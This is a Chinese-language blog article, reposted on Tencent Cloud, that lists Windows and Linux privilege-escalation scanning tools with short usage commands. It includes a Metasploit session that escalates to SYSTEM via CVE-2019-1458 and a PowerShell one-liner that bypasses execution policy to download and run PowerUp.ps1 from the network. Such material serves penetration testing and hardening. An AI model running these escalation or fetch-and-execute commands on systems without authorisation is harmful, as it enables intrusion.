前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >干货 | Windows/Linux下常用的提权扫描辅助工具总结

干货 | Windows/Linux下常用的提权扫描辅助工具总结

作者头像
HACK学习
发布2022-02-17 16:22:40
3.1K0
发布2022-02-17 16:22:40
举报
文章被收录于专栏:HACK学习HACK学习

常用的提权扫描辅助工具总结

使用Windows-Exploit-Suggester解析systeminfo

下载地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester

代码语言:javascript
复制
./windows-exploit-suggester.py

使用Linux-Exploit-Suggester.sh寻找linux提权问题

下载地址:https://github.com/mzet-/linux-exploit-suggester

代码语言:javascript
复制
./linux-exploit-suggester.sh

使用Sherlock工具

下载地址:https://github.com/rasta-mouse/Sherlock

代码语言:javascript
复制
Import-Module Sherlock.ps1
Find-AllVulns

使用MSF查询补丁和可利用提权漏洞

代码语言:javascript
复制
#查询补丁

meterpreter> run post/windows/gather/enum_patches 
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

#查询Exp

msf> use post/multi/recon/local_exploit_suggester 
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

# 利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium 
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

使用powerup检查提权漏洞

代码语言:javascript
复制
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改

代码语言:javascript
复制
accesschk "d:\dir"
查看所有用户在d盘dir路径的子路径的权限

accesschk "Administrator "d:\dir"
查看Administrator用户在d盘dir路径的子路径的权限

accesschk Administrators -c *
查看Administrators组对所有服务的权限

accesschk -k Guest hklm\software
查看Guest用户对hklm\software注册表的权限

accesschk -ou User
查看User用户对全局对象的权限

查找主机上具有的CVE,查找具有公开EXP的CVE的Python脚本

下载地址:https://github.com/chroblert/WindowsVulnScan

代码语言:javascript
复制
.\KBCollect.ps1
python3 -m pip install requirements.txt
cve-check.py -u

查看具有公开EXP的CVE
cve-check.py -C -f KB.json

在线提权漏洞检测平台

极光无限出品的安全扫描仪,在提权方面,基于其强大的安全检测能力,能够给出专业的修复建议,有效验证和加固网络资产漏洞。

查询地址:https://detect.secwx.com/

提权辅助网页

在Windows提权的时候,对比补丁找Exp很烦吧?这个网站数据源每周更新一次,值得推荐

查询地址:http://bugs.hacking8.com/tiquan/

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-02-08,如有侵权请联系 cloudcommunity@tencent.com 删除
windows
github
git
开源
安全

本文分享自 HACK学习呀 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

windows
github
git
开源
安全
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
目录
  • 常用的提权扫描辅助工具总结
    • 使用Windows-Exploit-Suggester解析systeminfo
      • 使用Linux-Exploit-Suggester.sh寻找linux提权问题
        • 使用Sherlock工具
          • 使用MSF查询补丁和可利用提权漏洞
            • 使用powerup检查提权漏洞
              • 使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改
                • 查找主机上具有的CVE,查找具有公开EXP的CVE的Python脚本
                  • 在线提权漏洞检测平台
                    • 提权辅助网页
                    相关产品与服务
                    脆弱性检测服务
                    脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。
                    产品介绍
                    精选特惠 用云无忧
                    领券

                    腾讯云开发者

                    扫码关注腾讯云开发者

                    扫码关注腾讯云开发者

                    领取腾讯云代金券

                    热门产品

                    热门推荐

                    更多推荐

                    Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

                    深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

                    腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

                    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

                    Copyright © 2013 - 2024 Tencent Cloud.

                    All Rights Reserved. 腾讯云 版权所有

                    登录 后参与评论